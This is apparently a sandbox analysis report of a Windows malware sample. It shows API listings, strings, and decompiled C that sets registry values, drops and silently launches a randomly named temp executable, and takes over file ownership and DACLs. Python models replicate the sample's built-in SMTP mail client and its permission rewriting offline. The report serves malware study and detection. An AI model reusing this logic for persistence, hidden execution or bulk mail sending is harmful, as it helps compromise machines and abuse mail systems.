0x00000000
0x00000000
0x00000000
0x00000000
0x0040a80a
0x0040a80c
0x0040a871
0x0040a871
0x0040a874
0x0040a875
0x00000000
0x00000000
0x0040a813
0x0040a816
0x0040a816
0x0040a819
0x0040a819
0x0040a81b
0x0040a81c
0x00000000
0x00000000
0x0040a836
0x0040a839
0x0040a839
0x0040a83c
0x0040a83c
0x0040a83e
                                                                                                                                  0x0040a83f
                                                                                                                                  0x0040a820
                                                                                                                                  0x0040a824
                                                                                                                                  0x0040a82f
                                                                                                                                  0x0040a87a
                                                                                                                                  0x0040a87a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • wsprintfA.USER32 ref: 0040A7FB
                                                                                                                                  • lstrlenA.KERNEL32(?,00000000,00000000,00000001), ref: 0040A87E
                                                                                                                                  • send.WS2_32(00000000,?,00000000,00000000), ref: 0040A893
                                                                                                                                  • wsprintfA.USER32 ref: 0040A8AF
                                                                                                                                  • send.WS2_32(00000000,.,00000005,00000000), ref: 0040A8D2
                                                                                                                                  • wsprintfA.USER32 ref: 0040A8E2
                                                                                                                                  • recv.WS2_32(00000000,?,000003F6,00000000), ref: 0040A97C
                                                                                                                                  • wsprintfA.USER32 ref: 0040A9B9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: wsprintf$send$lstrlenrecv
                                                                                                                                  • String ID: .$AUTH LOGIN$ESMTP$Error sending command (sent = %d/%d)$Incorrect respons$Too big smtp respons (%d bytes)$Too small respons$data$ehlo %s$helo %s$localcfg$mail from:<%s>$quit$rcpt to:<%s>
                                                                                                                                  • API String ID: 3650048968-2394369944
                                                                                                                                  • Opcode ID: c6cb36aca3368d580b4f06862e298dacd866bb1fbaab33c91d69e95154328597
                                                                                                                                  • Instruction ID: cb8b6fe7cbcb8804cc0a5996a8d7cccc3c4edaa2c523fe44b9a5a0cb3107b5a3
                                                                                                                                  • Opcode Fuzzy Hash: c6cb36aca3368d580b4f06862e298dacd866bb1fbaab33c91d69e95154328597
                                                                                                                                  • Instruction Fuzzy Hash: 34A16872A44305AADF209A54DC85FEF3B79AB00304F244437FA05B61D0DA7D9DA98B5F
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%
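The strings and API calls above describe a hand-rolled SMTP client: ehlo (falling back to helo), optional AUTH LOGIN, mail from, rcpt to, data, a five-byte end-of-message terminator and quit, with each reply read into a 0x3F6-byte buffer and rejected as "Too big", "Too small" or "Incorrect". The following Python is an added model of that exchange, written for this page; it is not code from the sample and not produced by Joe Sandbox. The host name, addresses, message body and the scripted server are constructed, and the exact status codes the client insists on are an assumption, since the comparison logic is not in the listing.

```python
import base64
import socket
import threading

RECV_SIZE = 0x3F6   # recv() buffer length in the API list above (1014 bytes)
b64 = lambda s: base64.b64encode(s.encode("ascii")).decode("ascii")


class SmtpError(Exception):
    """Raised with the same wording as the status strings in the sample."""


def send_cmd(sock, line):
    """Send one command line; a partial send is an error, as in the sample."""
    payload = line.encode("ascii") + b"\r\n"
    sent = sock.send(payload)
    if sent != len(payload):
        raise SmtpError("Error sending command (sent = %d/%d)" % (sent, len(payload)))


def read_reply(sock):
    """Read one reply into a RECV_SIZE buffer and return its 3-digit status code."""
    data = sock.recv(RECV_SIZE)
    if len(data) >= RECV_SIZE:                        # buffer full: reply rejected, not reassembled
        raise SmtpError("Too big smtp respons (%d bytes)" % len(data))
    if len(data) < 3:
        raise SmtpError("Too small respons")
    return data[:3].decode("ascii", "replace")


def smtp_send(sock, helo_name, sender, recipient, body, auth=None):
    """Client side of the dialog implied by the format strings; returns the codes seen."""
    codes = []

    def want(expected):
        codes.append(read_reply(sock))
        if codes[-1] != expected:
            raise SmtpError("Incorrect respons")

    want("220")                                       # greeting
    send_cmd(sock, "ehlo %s" % helo_name)
    codes.append(read_reply(sock))
    if codes[-1] != "250":                            # ESMTP refused: fall back to HELO
        send_cmd(sock, "helo %s" % helo_name)
        want("250")
    steps = []
    if auth is not None:                              # AUTH LOGIN: base64 user, then password
        steps += [("AUTH LOGIN", "334"), (b64(auth[0]), "334"), (b64(auth[1]), "235")]
    steps += [("mail from:<%s>" % sender, "250"), ("rcpt to:<%s>" % recipient, "250"), ("data", "354")]
    for cmd, expected in steps:
        send_cmd(sock, cmd)
        want(expected)
    sock.sendall(body.encode("ascii") + b"\r\n.\r\n")  # 5-byte terminator, cf. send(…, ".", 5, …)
    want("250")
    send_cmd(sock, "quit")
    want("221")
    return codes


def scripted_server(sock, accept_ehlo=True, greeting_pad=0):
    """Constructed peer so the dialog runs offline; returns the command lines it saw."""
    seen, f = [], sock.makefile("rb")
    reply = lambda code, text: sock.sendall(("%s %s\r\n" % (code, text)).encode("ascii"))
    reply("220", "mx.example ESMTP" + "x" * greeting_pad)   # pad to provoke "Too big"
    for raw in iter(f.readline, b""):
        line = raw.rstrip(b"\r\n").decode("ascii", "replace")
        seen.append(line)
        verb = line.split(" ", 1)[0].lower()
        if verb == "ehlo":
            reply(*(("250", "mx.example") if accept_ehlo else ("502", "not implemented")))
        elif verb in ("helo", "mail", "rcpt"):
            reply("250", "ok")
        elif verb == "auth":                          # consume the base64 user and password lines
            for code, prompt in (("334", "VXNlcm5hbWU6"), ("334", "UGFzc3dvcmQ6")):
                reply(code, prompt)
                f.readline()
            reply("235", "authenticated")
        elif verb == "data":
            reply("354", "end with <CRLF>.<CRLF>")
            while f.readline() not in (b".\r\n", b""):
                pass
            reply("250", "queued")
        elif verb == "quit":
            reply("221", "bye")
            break
        else:
            reply("500", "unrecognised")
    return seen


def run_dialog(accept_ehlo=True, auth=None, greeting_pad=0):
    """Run client and scripted server over a socketpair; return (codes, commands the server saw)."""
    client, server = socket.socketpair()
    box = {}
    t = threading.Thread(target=lambda: box.update(seen=scripted_server(server, accept_ehlo, greeting_pad)))
    t.start()
    try:
        codes = smtp_send(client, "victim-pc", "a@example.test", "b@example.test",
                          "Subject: constructed test\r\n\r\nhello", auth)   # constructed message
    finally:
        client.close()
        t.join(5)
        server.close()
    return codes, box.get("seen", [])


def dialog_error(**kw):
    """Return the SmtpError text a dialog fails with, or None if it completes."""
    try:
        run_dialog(**kw)
    except SmtpError as e:
        return str(e)
```

Two details worth keeping for network detection are visible in the strings themselves: the verbs are sent in lower case ("ehlo", "mail from:", "rcpt to:"), and a reply of 1014 bytes or more is treated as an error rather than reassembled across further recv() calls.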

                                                                                                                                  APIs
                                                                                                                                  • GetUserNameA.ADVAPI32(?,?), ref: 00AD7A96
                                                                                                                                  • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00AD7ACD
                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00AD7ADF
                                                                                                                                  • GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 00AD7B01
                                                                                                                                  • GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 00AD7B1F
                                                                                                                                  • EqualSid.ADVAPI32(?,?), ref: 00AD7B39
                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000014), ref: 00AD7B4A
                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00AD7B58
                                                                                                                                  • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00AD7B68
                                                                                                                                  • SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 00AD7B77
                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 00AD7B7E
                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AD7B9A
                                                                                                                                  • GetAce.ADVAPI32(?,?,?), ref: 00AD7BCA
                                                                                                                                  • EqualSid.ADVAPI32(?,?), ref: 00AD7BF1
                                                                                                                                  • DeleteAce.ADVAPI32(?,?), ref: 00AD7C0A
                                                                                                                                  • EqualSid.ADVAPI32(?,?), ref: 00AD7C2C
                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000014), ref: 00AD7CB1
                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00AD7CBF
                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 00AD7CD0
                                                                                                                                  • SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 00AD7CE0
                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 00AD7CEE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
                                                                                                                                  • String ID: D
                                                                                                                                  • API String ID: 3722657555-2746444292
                                                                                                                                  • Opcode ID: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                                                                  • Instruction ID: 8a7859828e80ea6ee7d19c3a3d98ff1f2f61c0dd3d50b42d3c25c0161a6b7a5f
                                                                                                                                  • Opcode Fuzzy Hash: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                                                                  • Instruction Fuzzy Hash: 74815D71D04219AFDB25CFA4DD84FEEBBB8FF08304F04806AE506E6250E7759A45CBA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%
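The API sequence above resolves the current user name to a SID (GetUserNameA, LookupAccountNameA), reads a file's owner and DACL (GetFileSecurityA with SECURITY_INFORMATION 5 = OWNER | DACL), compares the owner with that SID and rewrites it (SetFileSecurityA with 1), then walks the DACL with GetAce/EqualSid/DeleteAce and writes the DACL back (SetFileSecurityA with 4). The following Python is an added model of that logic over SDDL text so the resulting descriptor can be reasoned about offline; it is not the sample's code and not a wrapper around the Windows APIs. The SIDs and the descriptor are constructed, ACE deletion is modeled as "every ACE whose SID equals the user's", and the target of the second EqualSid (ref 00AD7C2C) cannot be recovered from the listing, so it is not modeled.

```python
import re

# SECURITY_INFORMATION bits seen in the Get/SetFileSecurityA calls above
OWNER_SECURITY_INFORMATION = 0x1   # SetFileSecurityA(?, 1, ...)
DACL_SECURITY_INFORMATION = 0x4    # SetFileSecurityA(?, 4, ...); the Get call passes 5 = OWNER | DACL

# A few SDDL two-letter aliases so "WD" and "S-1-1-0" compare equal, as EqualSid would
SDDL_ALIASES = {"WD": "S-1-1-0", "BA": "S-1-5-32-544", "SY": "S-1-5-18", "AU": "S-1-5-11"}
SID_RE = re.compile(r"S-[\d-]+|[A-Z]{2}")
ACE_RE = re.compile(r"\(([^)]*)\)")


def canon_sid(token):
    """Map an SDDL alias to its S-1-... form; pass real SIDs through."""
    return SDDL_ALIASES.get(token, token)


def parse_sddl(sddl):
    """Parse the SDDL subset needed here: O:, G:, and D: with (type;flags;rights;;;sid) ACEs."""
    sd = {"owner": None, "group": None, "dacl_flags": "", "aces": []}
    pos = 0
    while pos < len(sddl):
        tag, rest = sddl[pos:pos + 2], sddl[pos + 2:]
        if tag in ("O:", "G:"):
            m = SID_RE.match(rest)
            if not m:
                raise ValueError("bad SID after %s at %d" % (tag, pos))
            sd["owner" if tag == "O:" else "group"] = canon_sid(m.group(0))
            pos += 2 + m.end()
        elif tag == "D:":
            body = rest.split("S:", 1)[0]                 # stop at a SACL if one follows
            sd["dacl_flags"] = body.split("(", 1)[0]      # e.g. "PAI"
            for ace in ACE_RE.findall(body):
                fields = ace.split(";")
                if len(fields) != 6:
                    raise ValueError("unsupported ACE %r" % ace)
                fields[5] = canon_sid(fields[5])
                sd["aces"].append(tuple(fields))
            pos += 2 + len(body)
        elif tag == "S:":
            break                                         # the function never touches the SACL
        else:
            raise ValueError("unexpected SDDL at %d: %r" % (pos, sddl[pos:]))
    return sd


def to_sddl(sd):
    """Serialise back to SDDL (aliases come out in their S-1-... form)."""
    out = []
    if sd["owner"]:
        out.append("O:" + sd["owner"])
    if sd["group"]:
        out.append("G:" + sd["group"])
    out.append("D:" + sd["dacl_flags"] + "".join("(%s)" % ";".join(a) for a in sd["aces"]))
    return "".join(out)


def rewrite_file_security(sd, user_sid):
    """Model of the API sequence: make user_sid the owner, then walk the DACL and delete
    every ACE whose SID equals user_sid. Returns (new_sd, security_information), the
    second value being the bitmask the real code would pass to SetFileSecurityA."""
    user_sid = canon_sid(user_sid)
    new = dict(sd, aces=list(sd["aces"]))
    info = 0
    if new["owner"] != user_sid:              # GetSecurityDescriptorOwner + EqualSid
        new["owner"] = user_sid               # SetSecurityDescriptorOwner; SetFileSecurityA(…, 1, …)
        info |= OWNER_SECURITY_INFORMATION
    kept = [ace for ace in new["aces"] if ace[5] != user_sid]   # GetAce / EqualSid / DeleteAce loop
    if len(kept) != len(new["aces"]):
        new["aces"] = kept                    # SetSecurityDescriptorDacl; SetFileSecurityA(…, 4, …)
        info |= DACL_SECURITY_INFORMATION
    return new, info


def explicit_rights(sd, sid):
    """Triage helper: rights tokens explicitly granted (type A ACEs) to sid in this DACL."""
    sid = canon_sid(sid)
    return [ace[2] for ace in sd["aces"] if ace[0] == "A" and ace[5] == sid]
```

When reading the result, remember that on Windows the owner of an object always has implicit READ_CONTROL and WRITE_DAC regardless of the DACL, so "no ACE for the user's SID" after this sequence does not mean the user has lost the ability to read or change the descriptor; the effect on the user's other access depends on the remaining ACEs (here the Administrators and Everyone entries).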

                                                                                                                                  C-Code - Quality: 97%
			E00408328(char* __ecx, char __edx) {
				char _v8;
				void* _v12;
				int _v16;
				char _v20;
				intOrPtr _v24;
				int _v28;
				struct _PROCESS_INFORMATION _v44;
				char _v60;
				struct _STARTUPINFOA _v128;
				char _v388;
				char _v427;
				char _v428;
				char _t88;
				char _t89;
				void* _t91;
				char _t93;
				int _t102;
				char _t107;
				intOrPtr _t113;
				char _t116;
				void* _t117;
				signed int _t122;
				char _t126;
				void* _t128;
				char* _t130;
				char _t131;
				char* _t133;
				char _t134;
				char* _t137;
				int _t139;
				char _t144;
				char _t146;
				char* _t147;
				char _t149;
				char _t153;
				intOrPtr* _t154;
				char* _t156;
				char* _t159;
				char _t160;
				char _t165;
				void* _t174;
				signed int _t177;
				char _t180;
				char* _t188;
				int _t189;
				long _t193;
				void* _t195;
				void* _t196;
				void* _t198;
				void* _t199;

				// Reads the REG_SZ value named by *0x412c38 under an HKCU key whose path is
				// built into the 0x4122f8 buffer; if the key cannot be opened for reading,
				// the value is (re)written from the string at *0x412c3c. The comments are
				// editorial; the code itself is the sandbox's decompiler output.
				_t181 = __edx;
				_t173 = __ecx;
				_v16 = 0;
				if(E00407DD6(__edx) != 0) {
					return 1;
				}
				_t88 = E00406EC3();
				__eflags = _t88;
				if(_t88 != 0) {
					_v8 = 0;
					__eflags =  *0x412c3c; // 0x0  (pointer to the value data; null in this dump)
					if(__eflags == 0) {
						goto L37;
					}
					__eflags =  *0x412c38; // 0x0  (pointer to the value name; null in this dump)
					if(__eflags == 0) {
						goto L37;
					}
					// E00402544 fills the 0x4122f8 buffer with the key path; its extra arguments
					// (0x2e, 0xe4, 0xc8) look like string-decoding parameters, but the helper's
					// body is not part of this listing.
					_t130 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
					_t198 = _t196 + 0x14;
					// 0x80000001 = HKEY_CURRENT_USER; 0x101 = KEY_QUERY_VALUE | KEY_WOW64_64KEY
					_t131 = RegOpenKeyExA(0x80000001, _t130, 0, 0x101,  &_v12);
					__eflags = _t131;
					if(_t131 != 0) {
						L31:
						// Read-open failed: reopen with write access and store the value.
						_t133 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
						_t198 = _t198 + 0x14;
						// 0x103 = KEY_QUERY_VALUE | KEY_SET_VALUE | KEY_WOW64_64KEY
						_t134 = RegOpenKeyExA(0x80000001, _t133, 0, 0x103,  &_v12);
						__eflags = _t134;
						if(_t134 != 0) {
							L35:
							// Wipes the 0x100-byte path buffer (memset-like helper) and frees
							// the value buffer if one was allocated.
							E0040EE2A(_t173, 0x4122f8, 0, 0x100);
							_t196 = _t198 + 0xc;
							__eflags = _v8;
							if(_v8 != 0) {
								E0040EC2E(_v8);
							}
							goto L37;
						}
						// Inline strlen over the value data; _t139 = length + 1 so the
						// terminating NUL is written as part of the REG_SZ value.
						_t188 =  *0x412c3c; // 0x0
						_t137 = _t188;
						_t44 =  &(_t137[1]); // 0x1
						_t173 = _t44;
						do {
							_t181 =  *_t137;
							_t137 =  &(_t137[1]);
							__eflags = _t181;
						} while (_t181 != 0);
						_t139 = _t137 - _t173 + 1;
						__eflags = _t139;
						// dwType 1 = REG_SZ
						RegSetValueExA(_v12,  *0x412c38, 0, 1, _t188, _t139);
						RegCloseKey(_v12);
						goto L35;
					}
					// First query with lpData = 0 only retrieves the type (_v28) and size (_v16).
					_t144 = RegQueryValueExA(_v12,  *0x412c38, 0,  &_v28, 0,  &_v16);
					__eflags = _t144;
					if(_t144 == 0) {
						__eflags = _v28 - 1;
						if(_v28 == 1) { // REG_SZ
							__eflags = _v16;
							if(_v16 > 0) {
								// E0040EBCC allocates _v16 bytes (from its use: the buffer is
								// later released with E0040EC2E).
								_t147 = E0040EBCC(_v16);
								_pop(_t173);
								_v8 = _t147;
								__eflags = _t147;
								if(_t147 != 0) {
									_t173 =  &_v16;
									// Second query reads the value data into the new buffer.
									_t149 = RegQueryValueExA(_v12,  *0x412c38, 0,  &_v28, _t147,  &_v16);
									__eflags = _t149;
									if(_t149 != 0) {
										E0040EC2E(_v8);
										_pop(_t173);
										_v8 = 0;
									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					RegCloseKey(_v12);
                                                                                                                                  					__eflags = _v8;
                                                                                                                                  					if(_v8 != 0) {
                                                                                                                                  						_t146 = E0040EED1(_v8,  *0x412c3c);
                                                                                                                                  						_pop(_t173);
                                                                                                                                  						__eflags = _t146;
                                                                                                                                  						if(_t146 == 0) {
                                                                                                                                  							goto L35;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					goto L31;
                                                                                                                                  				} else {
                                                                                                                                  					_t153 = E004073FF(_t173, 0x410264, 0, 0,  &_v388,  &_v60);
                                                                                                                                  					_t199 = _t196 + 0x14;
                                                                                                                                  					__eflags = _t153;
                                                                                                                                  					if(_t153 <= 0) {
                                                                                                                                  						L19:
                                                                                                                                  						_t91 = 0;
                                                                                                                                  						L56:
                                                                                                                                  						return _t91;
                                                                                                                                  					}
                                                                                                                                  					__eflags = _v388;
                                                                                                                                  					if(_v388 == 0) {
                                                                                                                                  						goto L19;
                                                                                                                                  					}
                                                                                                                                  					__eflags = _v60;
                                                                                                                                  					if(_v60 == 0) {
                                                                                                                                  						goto L19;
                                                                                                                                  					} else {
                                                                                                                                  						_t154 =  &_v388;
                                                                                                                                  						_t181 = _t154 + 1;
                                                                                                                                  						do {
                                                                                                                                  							_t180 =  *_t154;
                                                                                                                                  							_t154 = _t154 + 1;
                                                                                                                                  							__eflags = _t180;
                                                                                                                                  						} while (_t180 != 0);
                                                                                                                                  						_t156 = _t195 + _t154 - _t181 - 0x181;
                                                                                                                                  						__eflags =  *_t156 - 0x5c;
                                                                                                                                  						if( *_t156 == 0x5c) {
                                                                                                                                  							 *_t156 = 0;
                                                                                                                                  						}
                                                                                                                                  						__eflags =  *0x412159 - 0x60;
                                                                                                                                  						if( *0x412159 < 0x60) {
                                                                                                                                  							L18:
                                                                                                                                  							E0040EE2A(_t180, 0x4122f8, 0, 0x100);
                                                                                                                                  							_t196 = _t199 + 0xc;
                                                                                                                                  							L37:
                                                                                                                                  							_v20 = 0;
                                                                                                                                  							_v8 = 0;
                                                                                                                                  							__eflags =  *0x4121a8; // 0x0
                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                  								L42:
                                                                                                                                  								__eflags =  *0x412cd8; // 0x0
                                                                                                                                  								if(__eflags != 0) {
                                                                                                                                  									L46:
                                                                                                                                  									_t89 = E00406BA7(0x412cd8);
                                                                                                                                  									_pop(_t174);
                                                                                                                                  									__eflags = _t89;
                                                                                                                                  									if(_t89 == 0) {
                                                                                                                                  										L52:
                                                                                                                                  										 *0x412cd8 = 0;
                                                                                                                                  										L53:
                                                                                                                                  										__eflags = _v8;
                                                                                                                                  										if(_v8 != 0) {
                                                                                                                                  											E0040EC2E(_v8);
                                                                                                                                  										}
                                                                                                                                  										_t91 = 1;
                                                                                                                                  										__eflags = 1;
                                                                                                                                  										goto L56;
                                                                                                                                  									}
                                                                                                                                  									_t93 = E00407E2F(_t181);
                                                                                                                                  									__eflags = _t93;
                                                                                                                                  									if(_t93 != 0) {
                                                                                                                                  										L51:
                                                                                                                                  										DeleteFileA(0x412cd8);
                                                                                                                                  										goto L52;
                                                                                                                                  									}
                                                                                                                                  									_t193 = 0x44;
                                                                                                                                  									E0040EE2A(_t174,  &_v128, 0, _t193);
                                                                                                                                  									_v128.cb = _t193;
                                                                                                                                  									E0040EE2A(_t174,  &_v44, 0, 0x10);
                                                                                                                                  									_v428 = 0x22;
                                                                                                                                  									lstrcpyA( &_v427, 0x412cd8);
                                                                                                                                  									_t102 = lstrlenA( &_v428);
                                                                                                                                  									 *((char*)(_t195 + _t102 - 0x1a8)) = 0x22;
                                                                                                                                  									 *((char*)(_t195 + _t102 - 0x1a7)) = 0;
                                                                                                                                  									E00407FCF(_t174);
                                                                                                                                  									_t107 = CreateProcessA(0,  &_v428, 0, 0, 0, 0x8000000, 0, 0,  &_v128,  &_v44);
                                                                                                                                  									__eflags = _t107;
                                                                                                                                  									if(_t107 == 0) {
                                                                                                                                  										E00407EE6(_t174);
                                                                                                                                  										E00407EAD(_t181, __eflags, 0);
                                                                                                                                  										goto L51;
                                                                                                                                  									}
                                                                                                                                  									CloseHandle(_v44.hThread);
                                                                                                                                  									CloseHandle(_v44);
                                                                                                                                  									goto L53;
                                                                                                                                  								}
                                                                                                                                  								GetTempPathA(0x12c, 0x412cd8);
                                                                                                                                  								_t113 = E00408274(0x412cd8);
                                                                                                                                  								_pop(_t177);
                                                                                                                                  								_v24 = _t113;
                                                                                                                                  								_t116 = (E0040ECA5() & 0x00000003) + 5;
                                                                                                                                  								_v20 = _t116;
                                                                                                                                  								__eflags = _t116;
                                                                                                                                  								if(_t116 <= 0) {
                                                                                                                                  									L45:
                                                                                                                                  									_t117 = E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8);
                                                                                                                                  									_t69 = _v24 + 0x412cd8; // 0x0
                                                                                                                                  									E0040EF00(_t69, _t117);
                                                                                                                                  									E0040EE2A(_t177, 0x4122f8, 0, 0x100);
                                                                                                                                  									_t196 = _t196 + 0x28;
                                                                                                                                  									goto L46;
                                                                                                                                  								} else {
                                                                                                                                  									goto L44;
                                                                                                                                  								}
                                                                                                                                  								do {
                                                                                                                                  									L44:
                                                                                                                                  									_t122 = E0040ECA5();
                                                                                                                                  									_t177 = 0x1a;
                                                                                                                                  									_t181 = _t122 % _t177 + 0x61;
                                                                                                                                  									_v24 = _v24 + 1;
                                                                                                                                  									_v20 = _v20 - 1;
                                                                                                                                  									 *((char*)(_v24 + 0x412cd8)) = _t122 % _t177 + 0x61;
                                                                                                                                  									__eflags = _v20;
                                                                                                                                  								} while (_v20 > 0);
                                                                                                                                  								goto L45;
                                                                                                                                  							}
                                                                                                                                  							_t126 = E0040675C(0x4121a8,  &_v20, 0);
                                                                                                                                  							_t196 = _t196 + 0xc;
                                                                                                                                  							_v8 = _t126;
                                                                                                                                  							__eflags =  *0x4121a8; // 0x0
                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                  								goto L42;
                                                                                                                                  							}
                                                                                                                                  							__eflags = _t126;
                                                                                                                                  							if(_t126 == 0) {
                                                                                                                                  								goto L42;
                                                                                                                                  							}
                                                                                                                                  							__eflags = _v20 -  *0x4121a4; // 0x0
                                                                                                                                  							if(__eflags != 0) {
                                                                                                                                  								goto L42;
                                                                                                                                  							}
                                                                                                                                  							_t128 = E004024C2(_v8, _t127, 0);
                                                                                                                                  							_t196 = _t196 + 0xc;
                                                                                                                                  							__eflags =  *0x4122d4 - _t128; // 0x0
                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                  								goto L53;
                                                                                                                                  							}
                                                                                                                                  							goto L42;
                                                                                                                                  						}
                                                                                                                                  						_t189 = 4;
                                                                                                                                  						_v8 = 0;
                                                                                                                                  						_v16 = _t189;
                                                                                                                                  						_t159 = E00402544(0x4122f8,  &E00410710, 0x35, 0xe4, 0xc8);
                                                                                                                                  						_t199 = _t199 + 0x14;
                                                                                                                                  						_t160 = RegOpenKeyExA(0x80000002, _t159, 0, 0x103,  &_v12);
                                                                                                                                  						__eflags = _t160;
                                                                                                                                  						if(_t160 != 0) {
                                                                                                                                  							goto L18;
                                                                                                                                  						}
                                                                                                                                  						_t165 = RegQueryValueExA(_v12,  &_v388, 0,  &_v28,  &_v8,  &_v16);
                                                                                                                                  						__eflags = _t165;
                                                                                                                                  						if(_t165 != 0) {
                                                                                                                                  							L16:
                                                                                                                                  							_v8 = 0;
                                                                                                                                  							RegSetValueExA(_v12,  &_v388, 0, _t189,  &_v8, _t189);
                                                                                                                                  							L17:
                                                                                                                                  							RegCloseKey(_v12);
                                                                                                                                  							goto L18;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _v28 - _t189;
                                                                                                                                  						if(_v28 != _t189) {
                                                                                                                                  							goto L16;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _v16 - _t189;
                                                                                                                                  						if(_v16 != _t189) {
                                                                                                                                  							goto L16;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _v8;
                                                                                                                                  						if(_v8 == 0) {
                                                                                                                                  							goto L17;
                                                                                                                                  						}
                                                                                                                                  						goto L16;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  			}
                                                                                                                                  0x004084a2
                                                                                                                                  0x004084ad
                                                                                                                                  0x004084b6
                                                                                                                                  0x004084b8
                                                                                                                                  0x004084ba
                                                                                                                                  0x00408543
                                                                                                                                  0x0040855f
                                                                                                                                  0x00408564
                                                                                                                                  0x0040856d
                                                                                                                                  0x0040856f
                                                                                                                                  0x00408571
                                                                                                                                  0x004085a5
                                                                                                                                  0x004085ac
                                                                                                                                  0x004085b1
                                                                                                                                  0x004085b4
                                                                                                                                  0x004085b7
                                                                                                                                  0x004085bc
                                                                                                                                  0x004085c1
                                                                                                                                  0x00000000
                                                                                                                                  0x004085b7
                                                                                                                                  0x00408573
                                                                                                                                  0x00408579
                                                                                                                                  0x0040857b
                                                                                                                                  0x0040857b
                                                                                                                                  0x0040857e
                                                                                                                                  0x0040857e
                                                                                                                                  0x00408580
                                                                                                                                  0x00408581
                                                                                                                                  0x00408581
                                                                                                                                  0x00408587
                                                                                                                                  0x00408587
                                                                                                                                  0x00408596
                                                                                                                                  0x0040859f
                                                                                                                                  0x00000000
                                                                                                                                  0x0040859f
                                                                                                                                  0x004084d3
                                                                                                                                  0x004084d9
                                                                                                                                  0x004084db
                                                                                                                                  0x004084dd
                                                                                                                                  0x004084e1
                                                                                                                                  0x004084e3
                                                                                                                                  0x004084e6
                                                                                                                                  0x004084eb
                                                                                                                                  0x004084f0
                                                                                                                                  0x004084f1
                                                                                                                                  0x004084f4
                                                                                                                                  0x004084f6
                                                                                                                                  0x004084f8
                                                                                                                                  0x0040850b
                                                                                                                                  0x00408511
                                                                                                                                  0x00408513
                                                                                                                                  0x00408518
                                                                                                                                  0x0040851d
                                                                                                                                  0x0040851e
                                                                                                                                  0x0040851e
                                                                                                                                  0x00408513
                                                                                                                                  0x004084f6
                                                                                                                                  0x004084e6
                                                                                                                                  0x004084e1
                                                                                                                                  0x00408524
                                                                                                                                  0x0040852a
                                                                                                                                  0x0040852d
                                                                                                                                  0x00408538
                                                                                                                                  0x0040853e
                                                                                                                                  0x0040853f
                                                                                                                                  0x00408541
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00408541
                                                                                                                                  0x00000000
                                                                                                                                  0x0040835c
                                                                                                                                  0x0040836e
                                                                                                                                  0x00408373
                                                                                                                                  0x00408376
                                                                                                                                  0x00408378
                                                                                                                                  0x00408464
                                                                                                                                  0x00408464
                                                                                                                                  0x00408779
                                                                                                                                  0x00000000
                                                                                                                                  0x0040877a
                                                                                                                                  0x0040837e
                                                                                                                                  0x00408384
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040838a
                                                                                                                                  0x0040838d
                                                                                                                                  0x00000000
                                                                                                                                  0x00408393
                                                                                                                                  0x00408393
                                                                                                                                  0x00408399
                                                                                                                                  0x0040839c
                                                                                                                                  0x0040839c
                                                                                                                                  0x0040839e
                                                                                                                                  0x0040839f
                                                                                                                                  0x0040839f
                                                                                                                                  0x004083a5
                                                                                                                                  0x004083ac
                                                                                                                                  0x004083af
                                                                                                                                  0x004083b1
                                                                                                                                  0x004083b1
                                                                                                                                  0x004083b3
                                                                                                                                  0x004083ba
                                                                                                                                  0x00408450
                                                                                                                                  0x00408457
                                                                                                                                  0x0040845c
                                                                                                                                  0x004085c2
